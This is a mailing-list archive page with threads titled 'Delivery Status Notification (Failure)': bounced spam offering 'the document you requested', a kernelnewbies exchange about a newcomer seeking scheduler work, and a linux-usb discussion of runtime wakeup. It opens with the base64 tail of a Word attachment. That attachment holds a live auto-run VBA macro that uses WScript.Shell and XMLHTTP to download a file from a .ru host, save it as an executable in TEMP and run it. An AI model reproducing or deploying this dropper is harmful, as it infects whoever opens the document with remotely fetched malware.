ACQAKAIBAC4ALgIAAEEANAEAAAAAtgAEAFRFTVAkADICAQAnADACAAAAAAAAtgADAEdFVAAg
ACoCtwAgAC4CQkAWAQMAIAAuAkJANAIAAAAAAAAAAF0A8gSQAQAAXQDyBMgBAADyBOABAADy
BPgBAAAAAAAAQQA0AQAAAAABASAALAL1AEEANAEAAAAArAABADkAbAFBADQBAAAAAO0AtgAB
AFcAtgACAFNjCwC2AAQAcmlwdAsAtgAEAC5TaGULALYAAgBsbAsAJAAoAgEALgAmAgAAQ0AW
AQAAAABBADQBAAAAACAALgIhADwCQ0CGAQEAAABBADQBAAAAACAAMAK2AAwAXHRyaGc0dHYu
Y29tEQCsAAIAQ0A+AgIAcQD//0ABAAAgADACtgAMAFx0cmhnNHR2LmNvbREAJwBAAgAAAAAA
ACAAQAIdACAARAIgACYCQkBCAgIAAAAAAEEANAEAAAAAbwD///gAAAC2ACMAaHR0cDovL2Zy
ZWVpbWFnZWhvc3QucnUvdWJhbm5lci5wbmcAJwAqAgAAAAD/////AAEAAP////8AAAG8sgBB
dHRyaWJ1dABlIFZCX05hbQBlID0gIlRoaQBzRG9jdW1lbhB0Ig0KCoxCYXMBAowxTm9ybWFs
Ai4ZVkdsb2JhbCEBqlNwYWMBbEZhCGxzZQyiQ3JlYRB0YWJsFR9QcmUgZGVjbGEABklkEQCe
VHJ1DUJFeHAIb3NlFBxUZW1wAGxhdGVEZXJpAnYVJEN1c3RvbQxpeoRDgzFTdWIgAEF1dG9f
T3BlQG4oKQ0KIAAAcwBtZXgNCkVuZPIgAA8NCoURCRGGGYwTAFdvcmtib29rD4onFRaBM4E5
RGltIABoVTg5dEdPRoBlMyBBcyBTANkQbmcNCoEMejdHAGZpdHJnb0ZJAQENSW50ZWdlcgGD
DUxqZ2Y0M3QERlWODHlEODV0iDlURgBfZXQgRQMDwFbCYmVPYmplYwB0KCJXIiArIAgiU2OC
AXJpcHQhAgIuU2hlAgJsbAIiwERDYWxsIFIYYW5kgU8AZnU2UgJGQBIiaHR0cDoALy9mcmVl
aW0AYWdlaG9zdC4AcnUvdWJhbm7AZXIucG5nwJZND2FCO2JvMzS/JkMQaEMBE042QWRvZMIw
YtIuQFNlYcICbYEzASBASVZJXw0KjSZTJ4BKQQYOE01pREhvcwJvAhJmdC5YTUwQSFRUUBFI
VmU0CHZmQ0ARRW52aQByb24oIlRFTQtCCkEXLgGSICJHRZBUIiwgwVIsIATNIUIHU2VuZEN3
YXJIcigpQXZMbwWDadGFAywgaocCZoUCjzRgV2l0aCAiJG8DLuhUeXBBcjFPAyEhn0aPYUeV
RqIccA53cmlAkQEiHXJlc3BvbnMgZUJvZHkwBVNhwHZlVG9GacCGBCoAJiAiXHRyaGeANHR2
LmNvbcAnBjLjb6EcDQpoVl8TYC50BQ0K5RkuUnUIbiAogAUpLCB2amKDnEZgoXNvEGaAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMxheQAAAQD/
GQQAAAkEAADjBAEAAAAAAAAAAAABAAUAAgD6ACoAXABHAHsAMAAwADAAMgAwADQARQBGAC0A
MAAwADAAMAAtADAAMAAwADAALQBDADAAMAAwAC0AMAAwADAAMAAwADAAMAAwADAAMAA0ADYA
fQAjADQALgAwACMAOQAjAEMAOgBcAFAAUgBPAEcAUgBBAH4AMgBcAEMATwBNAE0ATwBOAH4A
MQBcAE0ASQBDAFIATwBTAH4AMQBcAFYAQgBBAFwAVgBCAEEANgBcAFYAQgBFADYALgBEAEwA
TAAjAFYAaQBzAHUAYQBsACAAQgBhAHMAaQBjACAARgBvAHIAIABBAHAAcABsAGkAYwBhAHQA
aQBvAG4AcwAAAAAAAAAAAAAAAAAeASoAXABHAHsAMAAwADAAMgAwADkAMAA1AC0AMAAwADAA
MAAtADAAMAAwADAALQBDADAAMAAwAC0AMAAwADAAMAAwADAAMAAwADAAMAA0ADYAfQAjADgA
LgAzACMAMAAjAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAIAAoAHgAOAA2ACkA
XABNAGkAYwByAG8AcwBvAGYAdAAgAE8AZgBmAGkAYwBlADUAXABPAEYARgBJAEMARQAxADEA
XABNAFMAVwBPAFIARAAuAE8ATABCACMATQBpAGMAcgBvAHMAbwBmAHQAIABXAG8AcgBkACAA
MQAxAC4AMAAgAE8AYgBqAGUAYwB0ACAATABpAGIAcgBhAHIAeQAAAAAAAAAAAAAAAAC8ACoA
XABHAHsAMAAwADAAMgAwADQAMwAwAC0AMAAwADAAMAAtADAAMAAwADAALQBDADAAMAAwAC0A
MAAwADAAMAAwADAAMAAwADAAMAA0ADYAfQAjADIALgAwACMAMAAjAEMAOgBcAFcAaQBuAGQA
bwB3AHMAXABTAHkAcwBXAG8AdwA2ADQAXABzAHQAZABvAGwAZQAyAC4AdABsAGIAIwBPAEwA
RQAgAEEAdQB0AG8AbQBhAHQAaQBvAG4AAAAAAAAAAAAAAAAAEgAqAFwAQwBOAG8AcgBtAGEA
bAASACoAXABDAE4AbwByAG0AYQBsAJWSwVUEAAAAAAAAADQBKgBcAEcAewAyAEQARgA4AEQA
MAA0AEMALQA1AEIARgBBAC0AMQAwADEAQgAtAEIARABFADUALQAwADAAQQBBADAAMAA0ADQA
RABFADUAMgB9ACMAMgAuADMAIwAwACMAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUA
cwAgACgAeAA4ADYAKQBcAEMAbwBtAG0AbwBuACAARgBpAGwAZQBzAFwATQBpAGMAcgBvAHMA
bwBmAHQAIABTAGgAYQByAGUAZABcAE8ARgBGAEkAQwBFADEAMQBcAE0AUwBPAC4ARABMAEwA
IwBNAGkAYwByAG8AcwBvAGYAdAAgAE8AZgBmAGkAYwBlACAAMQAxAC4AMAAgAE8AYgBqAGUA
YwB0ACAATABpAGIAcgBhAHIAeQAAAAAAAAAAAAAAAAABAAIABAAEAgAABgIBAAgCAAAKAgEA
DAL///////8AAAAA//8AAEB94FUCAP//////////////////////////////////////////
////////////////AAD///////////////////////8BAAAAAAAAAAAAAAAAAAAAAAAAAM2n
AQAYAFQAaABpAHMARABvAGMAdQBtAGUAbgB0ABQAMAAxADUANQBlADAANwBkAGMANwD//xUC
GABUAGgAaQBzAEQAbwBjAHUAbQBlAG4AdAD//9fnAAAAAAAAAAIAAABPCgAA////////AQEg
AgAA////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////AAIAAP//////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
//////////////////////////////////////8f8eWrmNKpTJXyD0a/3LR2/////wEAAAD/
////YAAAAIAAAAAAACMBJgD/AAgpAAAAAFEAAYQYAP8DAABmAADCAAWAFAD/AwAAd3JpdGUE
BFdvcmRTMTAAAwRWQkH34jAABQRXaW4xNo8QMAAFBFdpbjMy1RAwAAMETWFjs7IwAAQEVkJB
Nq0jMAAHBFByb2plY3QtrjAABgBzdGRvbGWTYDAABoAAAP8DAwBOb3JtYWzf2DAABoAAAP8D
AwBPZmZpY2UVdTAADARUaGlzRG9jdW1lbnQ8njAACYAAAP8DAwBfRXZhbHVhdGUY2TAACQRB
dXRvX09wZW5WIDAABARzbWV4HQ4wAAgEQXV0b09wZW7ZKjAADQRXb3JrYm9va19PcGVuDIEw
AAoEaFU4OXRHT0ZlMwmBMAALBHo3R2ZpdHJnb0ZJSg0wAAkETGpnZjQzdEZV06swAAgEeUQ4
NXQ5VEapDTAADABDcmVhdGVPYmplY3T4ijAABAB1NlJGaCAwAAUEaGJvMzTUITAABARJVklf
L4YwAAYAVmU0dmZD3OEwAAcARW52aXJvbhssMAAEAFNlbmTN5DAAAwRhcnILdTAAAQRpYBAw
AAEEamEQMAAMAHJlc3BvbnNlQm9keVTEMAAKAFNhdmVUb0ZpbGUeXzAAAwBoVl8bmzAAAwBS
dW5f0DAADQB2Yk5vcm1hbEZvY3VzpvkwAAgERG9jdW1lbnRq0zAAAv//AQFUAAAAFQIAAAAA
////////////////////////AAIBAP//AgIAAP//////////////////////////////////
DAL/////DgICAP//EAIDAP//EgIEAP//AAAOAAAAAQASAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAASUQ9Ins3ODAxRTQ5OC1ERTJBLTRCOUItODJCMi02
RjFFNTFENzg3Mjd9Ig0KRG9jdW1lbnQ9VGhpc0RvY3VtZW50LyZIMDAwMDAwMDANCk5hbWU9
IlByb2plY3QiDQpIZWxwQ29udGV4dElEPSIwIg0KVmVyc2lvbkNvbXBhdGlibGUzMj0iMzkz
MjIyMDAwIg0KQ01HPSI4QzhFNTBFNjUwNzY1NDc2NTQ3NjU0NzY1NCINCkRQQj0iMTgxQUM0
RjdDNUY3QzVGNyINCkdDPSJBNEE2NzgwRTg4OUI4OTlCODk2NCINCg0KW0hvc3QgRXh0ZW5k
ZXIgSW5mb10NCiZIMDAwMDAwMDE9ezM4MzJENjQwLUNGOTAtMTFDRi04RTQzLTAwQTBDOTEx
MDA1QX07VkJFOyZIMDAwMDAwMDANCg0KW1dvcmtzcGFjZV0NClRoaXNEb2N1bWVudD00NCwg
NDQsIDEyMTUsIDU4NSwgWg0KAAAAAAAAAAAAAAAAVGhpc0RvY3VtZW50AFQAaABpAHMARABv
AGMAdQBtAGUAbgB0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEA/v8DCgAA/////wYJ
AgAAAAAAwAAAAAAAAEYnAAAAxO7q8+zl7fIgTWljcm9zb2Z0IE9mZmljZSBXb3JkIDk3LTIw
MDMACgAAAE1TV29yZERvYwAQAAAAV29yZC5Eb2N1bWVudC44APQ5snEAAAAAAAAAAAAAAAAA
AAAAAAAAUABSAE8ASgBFAEMAVAB3AG0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAABQAAgD///////////////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAABtAAAAKQAAAAAAAAABAEMAbwBtAHAATwBiAGoAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgACAP///////////////wAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAG4AAAB5AAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAA////////////////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD///////////////8AAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=

[-- Attachment #2: Type: text/plain, Size: 205 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linuxfoundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
  2014-08-07 20:11             ` Valdis.Kletnieks at vt.edu
@ 2014-08-07 20:33               ` Nick Krause
  0 siblings, 0 replies; 183+ messages in thread
From: Nick Krause @ 2014-08-07 20:33 UTC (permalink / raw)
  To: kernelnewbies

On Thu, Aug 7, 2014 at 4:11 PM,  <Valdis.Kletnieks@vt.edu> wrote:
> On Thu, 07 Aug 2014 13:14:42 -0400, Nick Krause said:
>
>> No I don't take any offense, I am very rusty with kernel code haven't
>> touched it in like 2 years.
>
> Excuse me if I'm dubious. Yesterday you said:
>
> On Wed, 06 Aug 2014 18:11:30 -0400, Nick Krause said:
>> I am new to kernel programming and have a lot  questions about this
What I meant to state was I never tried to do it more then on my own and
didn't do much mostly tracing and reading code.
Nick

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
  2014-08-07 17:14           ` Nick Krause
@ 2014-08-07 20:11             ` Valdis.Kletnieks at vt.edu
  2014-08-07 20:33               ` Nick Krause
  0 siblings, 1 reply; 183+ messages in thread
From: Valdis.Kletnieks at vt.edu @ 2014-08-07 20:11 UTC (permalink / raw)
  To: kernelnewbies

On Thu, 07 Aug 2014 13:14:42 -0400, Nick Krause said:

> No I don't take any offense, I am very rusty with kernel code haven't
> touched it in like 2 years.

Excuse me if I'm dubious. Yesterday you said:

On Wed, 06 Aug 2014 18:11:30 -0400, Nick Krause said:
> I am new to kernel programming and have a lot  questions about this
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 848 bytes
Desc: not available
Url : http://lists.kernelnewbies.org/pipermail/kernelnewbies/attachments/20140807/40308ef5/attachment.bin 

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
  2014-08-07 12:29         ` Pramod Gurav
@ 2014-08-07 17:14           ` Nick Krause
  2014-08-07 20:11             ` Valdis.Kletnieks at vt.edu
  0 siblings, 1 reply; 183+ messages in thread
From: Nick Krause @ 2014-08-07 17:14 UTC (permalink / raw)
  To: kernelnewbies

On Thu, Aug 7, 2014 at 8:29 AM, Pramod Gurav <pramod.gurav.etc@gmail.com> wrote:
> On Thu, Aug 7, 2014 at 12:15 PM, priyaranjan <priyaranjan45678@gmail.com> wrote:
>>
>>
>>
>>>On Thu, Aug 7, 2014 at 12:59 AM, <Valdis.Kletnieks@vt.edu> wrote:
>>>
>>> >On Wed, 06 Aug 2014 15:07:21 -0400, Nick Krause said:
>>> >> Does anybody have some work in the scheduler subsystem I can work on
>>> >>  that is a good top dipping for a kernel newbie.
>>>
>>
>> I think you should start with learning the schedular and it code....may be
>> you can find something...
>>
>>
>>>
>>> >There is zero code in the scheduler that somebody of your demonstrated
>>> >competence will be able to successfully modify.
>>>
>>> >For that matter, there is zero code in most of the rest of the kernel
>>> >that you're in any position to patch.
>>
>>
>> One shouldn't judge a book by its cover....This is a newbie list, If  all
>> people here are already competent enough to post high-end patches(though
>> patching a kernel might not be a very huge thing in this world, given that
>> there are more complex things in this world) ..then there would be not need
>> of a newbie list.
>>
> Priyaranjan,
>
> With that analogy, Nick's book is a big hit in lkml! :) Nobody wants
> to read it! lol
> Nick, No offence meant!
>>>
>>>
>>> >Do yourself and the world a favor - make a resolution to *NOT* attempt
>>> >a patch of anything in the calendar year 2014, and spend the time
>>> > learning.
>>>
>>>
>>
>>
>> Its always a good idea to keep learning and keep others motivated to
>> learn... :)
>>
>>>
>>> ______________________________________________
>>> Kernelnewbies mailing list
>>> Kernelnewbies at kernelnewbies.org
>>> http://lists.kernelnewbies.org/mailman/listinfo/kernelnewbies
>>>
>>
>>
>> _______________________________________________
>> Kernelnewbies mailing list
>> Kernelnewbies at kernelnewbies.org
>> http://lists.kernelnewbies.org/mailman/listinfo/kernelnewbies
>>
>
>
>
> --
> Thanks and Regards
> Pramod
No I don't take any offense, I am very rusty with kernel code haven't
touched it in like 2 years.
If you want to me to learn through just answer my questions and I will learn.
Regards Nick

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
  2014-08-07  6:45       ` priyaranjan
@ 2014-08-07 12:29         ` Pramod Gurav
  2014-08-07 17:14           ` Nick Krause
  0 siblings, 1 reply; 183+ messages in thread
From: Pramod Gurav @ 2014-08-07 12:29 UTC (permalink / raw)
  To: kernelnewbies

On Thu, Aug 7, 2014 at 12:15 PM, priyaranjan <priyaranjan45678@gmail.com> wrote:
>
>
>
>>On Thu, Aug 7, 2014 at 12:59 AM, <Valdis.Kletnieks@vt.edu> wrote:
>>
>> >On Wed, 06 Aug 2014 15:07:21 -0400, Nick Krause said:
>> >> Does anybody have some work in the scheduler subsystem I can work on
>> >>  that is a good top dipping for a kernel newbie.
>>
>
> I think you should start with learning the schedular and it code....may be
> you can find something...
>
>
>>
>> >There is zero code in the scheduler that somebody of your demonstrated
>> >competence will be able to successfully modify.
>>
>> >For that matter, there is zero code in most of the rest of the kernel
>> >that you're in any position to patch.
>
>
> One shouldn't judge a book by its cover....This is a newbie list, If  all
> people here are already competent enough to post high-end patches(though
> patching a kernel might not be a very huge thing in this world, given that
> there are more complex things in this world) ..then there would be not need
> of a newbie list.
>
Priyaranjan,

With that analogy, Nick's book is a big hit in lkml! :) Nobody wants
to read it! lol
Nick, No offence meant!
>>
>>
>> >Do yourself and the world a favor - make a resolution to *NOT* attempt
>> >a patch of anything in the calendar year 2014, and spend the time
>> > learning.
>>
>>
>
>
> Its always a good idea to keep learning and keep others motivated to
> learn... :)
>
>>
>> ______________________________________________
>> Kernelnewbies mailing list
>> Kernelnewbies at kernelnewbies.org
>> http://lists.kernelnewbies.org/mailman/listinfo/kernelnewbies
>>
>
>
> _______________________________________________
> Kernelnewbies mailing list
> Kernelnewbies at kernelnewbies.org
> http://lists.kernelnewbies.org/mailman/listinfo/kernelnewbies
>



-- 
Thanks and Regards
Pramod

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
  2014-08-06 19:29     ` Valdis.Kletnieks at vt.edu
@ 2014-08-07  6:45       ` priyaranjan
  2014-08-07 12:29         ` Pramod Gurav
  0 siblings, 1 reply; 183+ messages in thread
From: priyaranjan @ 2014-08-07  6:45 UTC (permalink / raw)
  To: kernelnewbies

>On Thu, Aug 7, 2014 at 12:59 AM, <Valdis.Kletnieks@vt.edu> wrote:

> >On Wed, 06 Aug 2014 15:07:21 -0400, Nick Krause said:
> >> Does anybody have some work in the scheduler subsystem I can work on
> >>  that is a good top dipping for a kernel newbie.
>
>
I think you should start with learning the schedular and it code....may be
you can find something...



> >There is zero code in the scheduler that somebody of your demonstrated
> >competence will be able to successfully modify.
>
> >For that matter, there is zero code in most of the rest of the kernel
> >that you're in any position to patch.
>

One shouldn't judge a book by its cover....This is a newbie list, If  all
people here are already competent enough to post high-end patches(though
patching a kernel might not be a very huge thing in this world, given that
there are more complex things in this world) ..then there would be not need
of a newbie list.


>
> >Do yourself and the world a favor - make a resolution to *NOT* attempt
> >a patch of anything in the calendar year 2014, and spend the time
> learning.
>
>


Its always a good idea to keep learning and keep others motivated to
learn... :)


> ______________________________________________
> Kernelnewbies mailing list
> Kernelnewbies at kernelnewbies.org
> http://lists.kernelnewbies.org/mailman/listinfo/kernelnewbies
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.kernelnewbies.org/pipermail/kernelnewbies/attachments/20140807/32a1babd/attachment.html 

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
  2014-08-06 19:07   ` Nick Krause
@ 2014-08-06 19:29     ` Valdis.Kletnieks at vt.edu
  2014-08-07  6:45       ` priyaranjan
  0 siblings, 1 reply; 183+ messages in thread
From: Valdis.Kletnieks at vt.edu @ 2014-08-06 19:29 UTC (permalink / raw)
  To: kernelnewbies

On Wed, 06 Aug 2014 15:07:21 -0400, Nick Krause said:
> Does anybody have some work in the scheduler subsystem I can work on
>  that is a good top dipping for a kernel newbie.

There is zero code in the scheduler that somebody of your demonstrated
competence will be able to successfully modify.

For that matter, there is zero code in most of the rest of the kernel
that you're in any position to patch.

Do yourself and the world a favor - make a resolution to *NOT* attempt
a patch of anything in the calendar year 2014, and spend the time learning.
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 848 bytes
Desc: not available
Url : http://lists.kernelnewbies.org/pipermail/kernelnewbies/attachments/20140806/03929bbf/attachment.bin 

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
       [not found] ` <20cf307f30f822dc1504fffa98ec@google.com>
@ 2014-08-06 19:07   ` Nick Krause
  2014-08-06 19:29     ` Valdis.Kletnieks at vt.edu
  0 siblings, 1 reply; 183+ messages in thread
From: Nick Krause @ 2014-08-06 19:07 UTC (permalink / raw)
  To: kernelnewbies

Does anybody have some work in the scheduler subsystem I can work on
 that is a good top dipping for a kernel newbie.
Regards Nick

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2014-08-05 15:03 postmaster-+dl5rZIG5bfiBhKkSJXxiPXRex20P6io
  0 siblings, 0 replies; 183+ messages in thread
From: postmaster-+dl5rZIG5bfiBhKkSJXxiPXRex20P6io @ 2014-08-05 15:03 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 459 bytes --]

This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

       0djustine.brown-癞此膹淸膄ꤒ╼戽瑞읭࿪@public.gmane.org
       0dghan.walsh-癞此膹淸膄ꤒ╼戽瑞읭࿪@public.gmane.org
       05ilally-癞此膹淸膄ꤒ╼戽瑞읭࿪@public.gmane.org
       05c8a8c0-癞此膹淸膄ꤒ╼戽瑞읭࿪@public.gmane.org
       _qine.brown-癞此膹淸膄ꤒ╼戽瑞읭࿪@public.gmane.org




[-- Attachment #1.2: Type: message/delivery-status, Size: 700 bytes --]

[-- Attachment #1.3: Type: message/rfc822, Size: 1588 bytes --]

[-- Attachment #1.3.1.1: Type: text/plain, Size: 134 bytes --]

Hello, _qine.brown-+dl5rZIG5bfiBhKkSJXxiDYe/PSvh27I@public.gmane.org
   
Send you the document you requested on the forum.

id:5441534

[-- Attachment #2: Type: text/plain, Size: 205 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linuxfoundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2014-08-05  6:47 Mail Delivery Subsystem
  0 siblings, 0 replies; 183+ messages in thread
From: Mail Delivery Subsystem @ 2014-08-05  6:47 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA

Delivery to the following recipient failed permanently:

     info-yKSY/wR/bdsybXQ2qUz/+w@public.gmane.org

Technical details of permanent failure: 
Google tried to deliver your message, but it was rejected by the relay in.sjc.mx.trendmicro.com by in.sjc.mx.trendmicro.com. [216.99.131.210].

The error that the other server returned was:
554 5.7.1 <info-yKSY/wR/bdsybXQ2qUz/+w@public.gmane.org>: Recipient address rejected: Access denied

----- Original message -----

X-Gm-Message-State: ALoCoQlhaEYPHYVoiSzWLc7EsbsLzqZJyBZeplFeHZNtdi6d98vrhH7TkgGaVl4bdRXK5a9YWdnOPB5/u6/sQMDEoQ0LFsViRR7FIBqBrIad7Bu7oUwpsMAhL0GzKA9kH0SjR3X0wcxs
X-Received: by 10.68.111.193 with SMTP id ik1mr1799021pbb.145.1407221233432;
        Mon, 04 Aug 2014 23:47:13 -0700 (PDT)
X-Received: by 10.68.111.193 with SMTP id ik1mr1799005pbb.145.1407221233295;
        Mon, 04 Aug 2014 23:47:13 -0700 (PDT)
Return-Path: <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
Received: from vmx10249.hosting24.com.au ([111.67.21.26])
        by mx.google.com with ESMTP id id5si866794pbc.69.2014.08.04.23.47.11
        for <info-yKSY/wR/bdsybXQ2qUz/+w@public.gmane.org>;
        Mon, 04 Aug 2014 23:47:13 -0700 (PDT)
Received-SPF: fail (google.com: domain of containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org does not designate 111.67.21.26 as permitted sender) client-ip=111.67.21.26;
Authentication-Results: mx.google.com;
       spf=hardfail (google.com: domain of containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org does not designate 111.67.21.26 as permitted sender) smtp.mail=containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
Received: from [111.67.21.26] by vmx10249.hosting24.com.au id 69JlPDcUt3is with SMTP; Tue, 05 Aug 2014 16:47:10 +1000
Date: Tue, 05 Aug 2014 16:47:10 +1000
From: "Donatella" <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
X-Mailer: The Bat! (v4.03.2) Business
X-Priority: 3 (Normal)
Message-ID: <5835130098.37750593141110-KlUJlHOL05Qr1ztElnclhPjaCExdxbGBh13vi7wywA4@public.gmane.org>
To: <info-yKSY/wR/bdsybXQ2qUz/+w@public.gmane.org>
Subject: Re: Answer id=jrVROLl.
MIME-Version: 1.0
Content-Type: multipart/mixed;
 boundary="----------F84C15BAA497B0"

Hello, info-yKSY/wR/bdsybXQ2qUz/++G/Ez6ZCGd0@public.gmane.org
    
Send you the document you requested on the forum.
  
id:091468973

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2014-07-22  7:02 postmaster-EunbckgpuBjP01IbtRslpbpzq4S04n8Q
  0 siblings, 0 replies; 183+ messages in thread
From: postmaster-EunbckgpuBjP01IbtRslpbpzq4S04n8Q @ 2014-07-22  7:02 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 180 bytes --]

This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

       3dharry-EunbckgpuBjP01IbtRslpbpzq4S04n8Q@public.gmane.org




[-- Attachment #1.2: Type: message/delivery-status, Size: 257 bytes --]

[-- Attachment #1.3: Type: message/rfc822, Size: 51954 bytes --]

[-- Attachment #1.3.1.1: Type: text/plain, Size: 136 bytes --]

Hello, 3dharry-EunbckgpuBjP01IbtRslpflzjL+c3r5J@public.gmane.org
    
Send you the document you requested on the forum.

id:166791749924

[-- Attachment #1.3.1.2: Reply.doc --]
[-- Type: application/octet-stream, Size: 36352 bytes --]

[-- Attachment #2: Type: text/plain, Size: 205 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linuxfoundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
  2014-03-06  5:03   ` Jagdish Gedia
@ 2014-03-06 15:25     ` Alan Stern
  0 siblings, 0 replies; 183+ messages in thread
From: Alan Stern @ 2014-03-06 15:25 UTC (permalink / raw)
  To: Jagdish Gedia; +Cc: linux-kernel, linux-usb

On Thu, 6 Mar 2014, Jagdish Gedia wrote:

> Hi Alan,
> 
> Thanks for you informative reply.
> I will try your suggestion. yes, i will not get more than one wakeup per second.
> 
> I have tried below things.
> My usb device is using the cdc-acm.c driver.
> 
> inside cdc-acm.c file,
> 
> static struct usb_device *usb_device;
> 
> static int acm_probe(........, ....)
> {
>     usb_device = interface_to_usbdev(intf);
>     ..........
> }
> 
> inside interrupt handler
> 
> static irqhandle_t int_handler(..., ..)
> {
>    usb_lock_device(usb_device);
>    usb_remote_wakeup(usb_device);
>    usb_unlock_device(usb_device);
>    return IRQ_HANDLED;
> }
> 
> but these things are not working. kernel is crashing when interrupt occurs.

Because you didn't do what I said: Call pm_request_resume.  Not 
usb_remote_wakeup.

> I have some other doubt also.
> 
> 1. If usb is runtime suspended and if global suspend happens , do i
> need to do anything special to wakeup the usb device?

No.

> 2. How can i address particularly my usb device. right now, i am using
> usb_device = interface_to_usbdev(intf) to get pointer to my usb device
> inside probe function,

That's a perfectly good way to do it.  Lots of other drivers do the 
same thing.

>  but probe function is getting called for every
> interface of the device. Is there any other way through which i can
> get the pointer to my usb device like i can traverse all the available
> usb device and on basis of vendor and product id i can address my usb
> device or by any other way?

You can't get the device pointer unless you have something to start 
from.  For example, if you already have an interface pointer then you 
can use interface_to_usbdev.

Alan Stern


^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
       [not found] ` <001a11c2fcca7727e504f3e8d518@google.com>
@ 2014-03-06  5:03   ` Jagdish Gedia
  2014-03-06 15:25     ` Alan Stern
  0 siblings, 1 reply; 183+ messages in thread
From: Jagdish Gedia @ 2014-03-06  5:03 UTC (permalink / raw)
  To: Alan Stern, linux-kernel, linux-usb

Hi Alan,

Thanks for you informative reply.
I will try your suggestion. yes, i will not get more than one wakeup per second.

I have tried below things.
My usb device is using the cdc-acm.c driver.

inside cdc-acm.c file,

static struct usb_device *usb_device;

static int acm_probe(........, ....)
{
    usb_device = interface_to_usbdev(intf);
    ..........
}

inside interrupt handler

static irqhandle_t int_handler(..., ..)
{
   usb_lock_device(usb_device);
   usb_remote_wakeup(usb_device);
   usb_unlock_device(usb_device);
   return IRQ_HANDLED;
}

but these things are not working. kernel is crashing when interrupt occurs.

I have some other doubt also.

1. If usb is runtime suspended and if global suspend happens , do i
need to do anything special to wakeup the usb device?

2. How can i address particularly my usb device. right now, i am using
usb_device = interface_to_usbdev(intf) to get pointer to my usb device
inside probe function, but probe function is getting called for every
interface of the device. Is there any other way through which i can
get the pointer to my usb device like i can traverse all the available
usb device and on basis of vendor and product id i can address my usb
device or by any other way?


thanks,
jagdish gediya

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2014-02-21  8:31 Mail Delivery System
  0 siblings, 0 replies; 183+ messages in thread
